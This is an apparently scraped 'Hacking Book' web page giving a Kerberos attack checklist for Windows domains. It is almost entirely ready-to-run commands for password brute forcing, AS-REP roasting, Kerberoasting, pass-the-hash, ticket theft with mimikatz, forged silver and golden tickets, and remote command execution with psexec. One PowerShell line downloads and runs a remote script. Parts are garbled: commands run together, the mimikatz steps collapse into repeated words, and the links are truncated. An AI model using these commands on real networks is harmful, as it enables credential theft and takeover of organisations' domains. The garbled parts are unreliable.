Hacking Book | Free Online Hacking Learning

Home

kerberos attack checklist

Posted by agaran at 2020-02-27
all

0x01 brute force

Use kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file> .\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

0x02 ASPEPRoast

Example getnpusers.py using impacket:

python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Using Rubeus:

.\Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file> hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>
john --wordlist=<passwords_file> <AS_REP_responses_file>

0x03 kerberosting attack

Use the impacket example getuserspns.py:

python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

Using Rubeus:

.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>

Using PowerShell:

iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>

Password dictionary cracking:

hashcat -m 13100 --force <TGSs_file> <passwords_file>

john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>

john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file> 0x04 Pass The Hash & Pass The Key 通过使用Impacket示例:

python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>python getTGT.py <domain_name>/<user_name>:[password]export KRB5CCNAME=<TGT_ccache_file>python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass .\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt.\PsExec.exe -accepteula \\<remote_hostname> cmd

0x05 Pass The Ticket (PTT)

Get tickets from Linux

Check the type and location of tickets:

grep default_ccache_name /etc/krb5.conf

If not returned, the default is file: / TMP / krb5cc {uid}

/tmp/krb5cc_%{uid}

In the case of tickets files, you can copy and paste (if you have permission) to use them.

If it's keying tickets, you can use ticker to get:

cp tickey /tmp/tickey
/tmp/tickey -i

Get tickets from windows

Using mimikatz:

mimikatz # sekurlsa::tickets /export

Use Rubeus in PowerShell:

.\Rubeus dump[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>")) python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi

Using ticket in Linux:

Use the impacket example:

export KRB5CCNAME=<TGT_ccache_file_path>python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass mimikatz

Use Rubeus to inject ticket:

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Use psexec to execute CMD on the remote machine:

.\PsExec.exe -accepteula \\<remote_hostname> cmd

0x06 Silver ticket

Use the impacket example:

python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>export KRB5CCNAME=<TGS_ccache_file>python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using mimikatz:

mimikatz mimikatz mimikatz mimikatz

Use Rubeus to inject ticket:

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Use psexec to execute CMD on the remote machine:

.\PsExec.exe -accepteula \\<remote_hostname> cmd python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>export KRB5CCNAME=<TGS_ccache_file>python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using mimikatz:

mimikatz mimikatz mimikatz mimikatz .\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Use psexec to execute CMD on the remote machine:

.\PsExec.exe -accepteula \\<remote_hostname> cmd

0x08 miscellaneous

Known password get NTLM:

python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<password>".encode("utf-16le")).digest())' kerbrute.py:https: Rubeus:https: PsExec:https: Impacket:https: tickey:https: Mimikatz:https: